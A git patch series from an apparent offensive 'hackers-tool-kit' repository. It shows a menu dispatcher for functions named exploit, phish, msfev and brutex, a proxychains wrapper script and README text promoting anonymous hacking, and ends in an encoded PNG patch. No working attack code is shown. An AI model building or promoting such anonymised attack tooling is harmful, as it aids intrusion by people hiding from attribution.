"resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + found = True +mainbanner() +main() diff --git a/htksecure.py b/htksecure.py new file mode 100644 index 0000000..bf09f3e --- /dev/null +++ b/htksecure.py @@ -0,0 +1,16 @@ +import os +import sys +print "--------------------------------------------------------------------------------------------------" +print """\033[93m!WELCOME TO THE SECURE VERSION OF HACKERS-TOOL-IT WHAT THIS MEANS IS THAT +THE HACKERS-TOOL-KIT WILL BE RUN WITH PROXYCHAINS MAKING YOU NEAR ANONYMOUS EXITING THE TERMINAL +SHOULD STOP THE PROXYCHAINS NOTE SOME STUFF MIGHT NOT WORK OR MIGHT BE SLOW DUE TO THE PROXYCHAINS +YOU HAVE TO HAVE YOUR PROXYCHAINS CONFIG FILE ALREADY SETUP TO USE THIS!\033[0m""" +print "--------------------------------------------------------------------------------------------------" +print "\n" +print "\033[92mWould you like to continue? y or n\033[0m" +h = raw_input("?: ") +if h == "n": + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() +if h == "y": + os.system("proxychains python /root/hackers-tool-kit/htk.py") From 559f7111987ed43560bea152a508eda86415e472 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 17 Mar 2019 22:46:02 +0100 Subject: [PATCH 040/214] Update README.md --- README.md | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/README.md b/README.md index 8a63865..faade47 100644 --- a/README.md +++ b/README.md @@ -21,3 +21,13 @@ my instagram @unkn0wn_bali * `cd hackers-tool-kit` * `python htk.py` + +# HTK Secure + +![](tools/screenshot4.png) + +the htksecure.py file will run the hackers-tool-kit with proxychains making you anonymous when hacking but some stuff might be slow or not work to run htk secure look below + +* cd hackers-tool-kit + +* python htksecure.py From c78a5d4f3292be5fb6d559707b6e89ec845c5b1e Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 17 Mar 2019 22:46:23 +0100 Subject: [PATCH 041/214] Add files via upload --- tools/screenshot4.png | Bin 0 -> 44810 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 tools/screenshot4.png diff --git a/tools/screenshot4.png b/tools/screenshot4.png new file mode 100644 index 0000000000000000000000000000000000000000..8af234e3d8a3245e5dca7169caac2529aaee640e GIT binary patch literal 44810 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 